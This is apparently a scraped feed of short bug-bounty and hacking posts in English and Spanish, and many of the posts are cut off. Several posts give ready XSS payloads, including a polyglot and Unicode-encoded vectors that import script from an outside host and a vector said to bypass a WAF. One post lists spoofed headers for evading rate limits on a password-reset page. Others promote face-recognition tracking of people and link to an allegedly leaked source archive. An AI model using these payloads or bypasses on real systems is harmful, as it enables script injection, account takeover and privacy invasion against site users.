Hello World!! El día de ayer desarrollé open2url, permite encontrar Open Redirects funcionales desde una lista de urls. 🔥 Todos los parámetros de redirección son editables. 👾👾👾 SGFwcHkgSGFja2luZyE👾👾👾 #bugbountyTip #bugbounty #tool #ciberseguridad #hacking #HackingTool

Use this #XSS payload to pop alert boxes EVERYWHERE! 😎 🏆 JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is/.source))}//\76-->

# Bypass 429 (Too Many Requests) 1. Try add some custom header ``` X-Forwarded-For : 127.0.0.1 X-Forwarded-Host : 127.0.0.1 X-Client-IP : 127.0.0.1 X-Remote-IP : 127.0.0.1 X-Remote-Addr : 127.0.0.1 X-Host : 127.0.0.1 ``` For example: ``` POST /ForgotPass.php HTTP/1.1 Host:

🚀Open Source Surveillance now offers Face Recognition Search! Easily locate and track people's appearances across the internet and social media. Register on os-surveillance.io #facerecognition #osint #intelligence #privacy #infosec #SmartCity #surveillance

Happy Hunting !!!! Curated collection of powerful one-liners tailored for bug bounty hunting, crafted with ♥ by the community. Contribute and enhance your bounty hunting arsenal! ## Quick Guide - **HOST:** Refers to a single hostname, domain, or IP address. - **HOSTS.txt:**

Aws pentesting Testing checklist #bugbounty

This is how a Cybercriminal exploits phone calls to steal Data/OTP using IVR.

🔥Awesome Shodan Dorks

W.AF AKAM.AI by.pass Lead to 30 XSS in large BBP🤯 "><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto"> Writeup Soon🫡 #bugbountytips #bugbountytip #bugbounty #hackerone #bugcrowd

GitLab Authentication Bypass (CVE-2024-45409) : blog.projectdiscovery.io/ruby-saml-gitl… credits Harsh Jaiswal Rahul Maini

Yay, I was awarded a $1,000 bounty on HackerOne! hackerone.com/gohanckz #TogetherWeHitHarder

Day 1 ! : .env leaked How to find : FUZZ all Endpoints and find leaks Wordlist : github.com/Bo0oM/fuzz.txt…

What a way to finish the Elite Eight round! 💪 Each of these amazing teams' incredible work over the last 11 days is something to be extremely proud of. On behalf of the entire HackerOne team and our #AmbassadorWorldCup partners AS Watson Group (Europe) and OKX--- THANK YOU! 🙌 Stay

A mini-thread on how I approached this "Stored XSS with CSP Bypass" together with 2sharthegreat and popped it on our second day of hunting on that target (1/x): 👇 #bugbounty

4 Ways to bypass checkout systems in e-commerce targets! 🤑 A thread! 🧵 👇

Unicode #XSS Vectors <Svg OnLoad=confirm(1)> %C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE <Svg OnLoad=import('//X55.is')> %C0%BCSvg%C0%A0OnLoad%C0%BDimport%C0%A8%C0%A7%C0%AF%C0%AFX55.is%C0%A7%C0%A9%C0%BE #BugBounty #PenTesting

– Vendedor: Le estamos ofreciendo 50 megas de velocidad. – Cliente: Yo tengo 10 gigas de velocidad. – Vendedor: Señor… 50 megas es más que 10 gigas, ¿ok?

Synckz |||||||||||||||||||||||||||||||||— 93% Progress I want to finish this proyect… ( There's more to come) 🔥🎯

Claude code source code has been leaked via a map file in their npm registry! Code: …a8527898604c1bbb12468b1581d95e.r2.dev/src.zip

Secrets & JS Analysis tools for bug bounty hunters: 1. TruffleHog - github.com/trufflesecurit… 2. Gitleaks - github.com/gitleaks/gitle… 3. KeyHacks - github.com/streaak/keyhac… 4. SecretFinder - github.com/m4ll0k/SecretF… 5. JSLuice - github.com/BishopFox/jslu… 6. jsleak -